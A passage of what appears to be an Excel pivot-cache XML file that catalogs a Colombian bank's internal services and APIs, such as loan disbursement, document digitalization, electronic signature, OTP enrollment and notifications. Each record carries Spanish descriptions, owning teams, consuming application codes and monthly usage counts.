    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio DesembolsoCreditoConsumo permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente._x000a_Aunque el servicio desde el punto de vista del proveedor (STI – Bankvision) esté desarrollado para permitir desembolsar cualquier tipo de crédito, en el presente servicio se acotará únicamente a los campos necesarios para realizar el desembolso de un crédito de consumo. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo._x000a_"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Desembolso Credito Consumo"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="NU0102001 _x000d__x000a_ELIBOM _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-02T15:17:21"/>
    <s v="Digital Document"/>
    <n v="100"/>
    <s v="Digital Document - Documents"/>
    <n v="100"/>
    <s v="digital-document-documents"/>
    <s v="Esta API permite a los consumidores que tienen limitantes para consumir directamente la API de contribución documental realizar la generación y firma de documentos a través de un componente de cadena"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <n v="2983"/>
    <n v="2789"/>
    <n v="2430"/>
    <n v="2124"/>
    <n v="2633"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Digitalizacion De Documentos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio DigitalizacionDeDocumentos, es una funcionalidad que expone el aplicativo de Servicios de Información Digital KOFAX para el procesamiento de un documento representado en forma digital bajo codificación base64"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW1011 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Digitalizacion De Documentos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio DigitalizacionDeDocumentos, es una funcionalidad que expone el aplicativo de Servicios de Información Digital KOFAX para el procesamiento de un documento representado en forma digital bajo codificación base64"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW0638 _x000d__x000a_AW1011 _x000d__x000a_NU0034001 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-25T17:41:11"/>
    <s v="Consumer Loan Sufi"/>
    <n v="111"/>
    <s v="Disbursement"/>
    <n v="100"/>
    <s v="disbursement"/>
    <s v="Esta API permitirá acceder a las operaciones relacionadas con el desembolso de una obligación, acción que se ejecuta luego de un estudio de crédito para cualquier tipo de producto de Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Wompi_NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ BotonRecaudoWompi_NU0093001"/>
    <n v="47853"/>
    <n v="18156"/>
    <n v="21457"/>
    <n v="26856"/>
    <n v="30200"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T15:10:59"/>
    <s v="Consumer Loan Sufi"/>
    <n v="201"/>
    <s v="Disbursement"/>
    <n v="200"/>
    <s v="disbursement"/>
    <s v="Esta API permitirá acceder a las operaciones relacionadas con el desembolso de una obligación, acción que se ejecuta luego de un estudio de crédito para cualquier tipo de producto de Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="47853"/>
    <n v="18156"/>
    <n v="21457"/>
    <n v="26856"/>
    <n v="30200"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Disponibilidad Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Disponibilidad Divisas tiene como objetivo realizar funcionalidades para la verificación de si es un horario hábil o no para la compra y venta de divisas en CIB."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Distribucion Tarjeta Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá la distribución a los clientes e inventarios de tarjetas débito (plásticos). Realizar operaciones que comprendan la distribución de estas y el manejo en los inventarios de las mismas, para las sucursales o para los operadores logísticos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-26T07:16:03"/>
    <s v="Document Management"/>
    <n v="100"/>
    <s v="Document Management - Digital Signature"/>
    <n v="100"/>
    <s v="document-management-digital-signature"/>
    <s v="La API Document Management - Digital Signature una vez se tenga la firma digital y el estampado cronológico de los documentos por parte del cliente se realizará la contribución o carga de dichos archivos directamente al Gestor Documental del Banco (WCC)..   NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:58012. Para trafico Cloud: https://172.25.87.4:58012."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BIZAGIBEG_AW1176001"/>
    <n v="225"/>
    <n v="1468"/>
    <n v="283"/>
    <n v="268"/>
    <n v="268"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-26T07:16:03"/>
    <s v="Document Management"/>
    <n v="100"/>
    <s v="Document Management - Digitalization"/>
    <n v="100"/>
    <s v="document-management-digitalization"/>
    <s v="El API DigitalizacionDeDocumentos, permite el procesamiento de un documento representado en forma digital, extrayendo la data allí­ incluida. NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:59098. Para trafico Cloud: https://172.25.87.4:59098."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BIZAGIBEG_AW1176001"/>
    <m/>
    <m/>
    <m/>
    <n v="6"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-05-26T18:06:55"/>
    <s v="Document Service"/>
    <n v="120"/>
    <s v="Document Service - Customer Documents"/>
    <n v="101"/>
    <s v="document-service-customer-documents"/>
    <s v="Permite a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así­ evitar, solicitarles a los clientes estos documentos de forma duplicada. El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueí±o del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaMetadataDocumental/V1.0"/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="PODEM01_NU0001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001"/>
    <n v="47"/>
    <n v="13"/>
    <n v="152"/>
    <n v="95"/>
    <n v="181"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-10T19:58:06"/>
    <s v="Document Service"/>
    <n v="120"/>
    <s v="Document Service - Documents Catalog"/>
    <n v="100"/>
    <s v="document-service-documents-catalog"/>
    <s v="Permite a los consumidores realizar la consulta de los documentos o formatos almacenados en WCC para iniciar un proceso por parte del cliente en el banco, la adquisición de un producto o bien sea recuperar los documentos del cliente para un proceso o producto especí­fico."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="RecuperarCatalogo_BB2/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-16T15:55:16"/>
    <s v="Document Service Data"/>
    <n v="100"/>
    <s v="Document Service Data - Files Information"/>
    <n v="100"/>
    <s v="document-service-data-files-information"/>
    <s v="La API permite centralizar, para los diferentes canales que originan y manejan documentos, el tráfico y su recepción sobre el componente de recepción documental."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="PODEM01_NU0001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-16T15:55:16"/>
    <s v="Document Service Data"/>
    <n v="100"/>
    <s v="Document Service Data - Process Data"/>
    <n v="100"/>
    <s v="document-service-data-process-data"/>
    <s v="El servicio Consulta Datos Documentos Proceso, tiene como objetivo Consultar los datos lí­quidos de un proceso especí­fico como una nota crédito, nota débito, etc."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="PODEM01_NU0001"/>
    <n v="7929"/>
    <n v="5966"/>
    <n v="6409"/>
    <n v="8838"/>
    <n v="7497"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Ejecutar Transferencia Externa"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Desde la sucursal virtual, el cliente puede efectuar transferencias externas desde una cuenta (ahorros ó corriente) a otros bancos o a otras filiales de Bancolombia en el exterior diferentes a la filial de la cuenta origen de la transferencia"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Ejecutar Transferencia Interna"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir realizar transferencias en línea entre las cuentas corrientes y de Ahorros de una misma filial del grupo Bancolombia en el exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-10T17:32:11"/>
    <s v="Electronic Promissory Note"/>
    <n v="100"/>
    <s v="Electronic Promissory Note - Management"/>
    <n v="100"/>
    <s v="electronic-promissory-note-management"/>
    <s v="Capacidad que permite la firma del titulo valor electrónico con las mismas caracterí­sticas de un pagaré fí­sico en cuanto a seguridad, veracidad jurí­dica, contenido y obligación de la promesa."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="GestionPagareElectronico/V1.0_x000a_GestionarPagareElectronico/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-25T11:54:11"/>
    <s v="Document Service Sufi"/>
    <n v="100"/>
    <s v="Electronic Signature"/>
    <n v="100"/>
    <s v="electronic-signature"/>
    <s v="Esta API ofrece a tus aplicaciones la posibilidad de poder realizar una firma digital a partir de un código generado por el cliente"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ Monitoreo_AW1378001 _x000d__x000a_ MONSUFI_AW1378001"/>
    <n v="91"/>
    <n v="616"/>
    <n v="3762"/>
    <n v="3408"/>
    <n v="5432"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-29T16:41:12"/>
    <s v="Electronic Signature"/>
    <n v="102"/>
    <s v="Electronic Signature - Simple Signature"/>
    <n v="102"/>
    <s v="electronic-signature-simple-signature"/>
    <s v="Permite a los consumidores realizar el proceso de firma de un documento por un íºnico firmante retornando el documento firmado al finalizar el proceso."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Eliminar Usuario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir eliminar cualquier usuario de la Sucursal Virtual para que no pueda utilizar el canal"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-10T22:09:08"/>
    <s v="Email Notifications"/>
    <n v="102"/>
    <s v="Email Notifications - Send Email Message"/>
    <n v="102"/>
    <s v="email-notifications-send-email-message"/>
    <s v="Permite el enví­o de correos electronicos personalizables mediante una plantilla HTML"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioCorreoElectronico/V1.0"/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ HistoriaCliente_NU0090001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ LoansApproval_NU107001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HABITATCONST_NU0013001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="20110"/>
    <n v="19820"/>
    <n v="25748"/>
    <n v="34210"/>
    <n v="33832"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores, (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1170 _x000d__x000a_NU0004001 _x000d__x000a_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-09-06T18:14:11"/>
    <s v="Enrollment"/>
    <n v="100"/>
    <s v="Enrollment - Users Management"/>
    <n v="100"/>
    <s v="enrollment-user-management"/>
    <s v="API para el manejo de enrolamiento."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-26T14:43:12"/>
    <s v="Enrollment"/>
    <n v="100"/>
    <s v="Enrollment - Users Management"/>
    <n v="100"/>
    <s v="enrollment-users-management"/>
    <s v="API para el manejo de enrolamiento."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <n v="45"/>
    <n v="30"/>
    <n v="52"/>
    <n v="33"/>
    <n v="28"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-04T15:55:18"/>
    <s v="Enterprises Loans"/>
    <n v="103"/>
    <s v="Enterprises Loans - Utilities"/>
    <n v="103"/>
    <s v="enterprises-loans-utilities"/>
    <s v="Por medio de esta API el banco enví­a en lí­nea y masivamente a Bancoldex  un paquete de solicitudes de redescuento que pasan por todas las validaciones necesarias, como la disponibilidad de recursos de la lí­nea de crédito de la entidad de redescuento, las condiciones financieras de cada solicitud y de control previo sobre el beneficiario de crédito. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="BIZAGIACJCN_AW1285001 _x000d__x000a_ APP_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3003"/>
    <n v="2792"/>
    <n v="2449"/>
    <n v="2130"/>
    <n v="2621"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Codigo Seguridad OTP"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Realizar el envió del código de Seguridad al cliente, a través del componente de alertas._x005f_x000D_ "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Notificacion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio para envio de Alertas y Notificacion por correo electronico o mensaje de texto al dispositivo celular, sobre cualquier proceso que se realice en el banco por parte del cliente y sea controlado por un consumidor en específico."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="AW1208001 _x000d__x000a_AW0937 _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW0638 _x000d__x000a_AW1142001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Recordatorio Usuario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite recordar al cliente E-banking el usuario para el ingresar a la plataforma Sucursal Empresas y Personas y deberá ser enviarlo a través del Componente de Alertas al cliente. (Delivery System)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
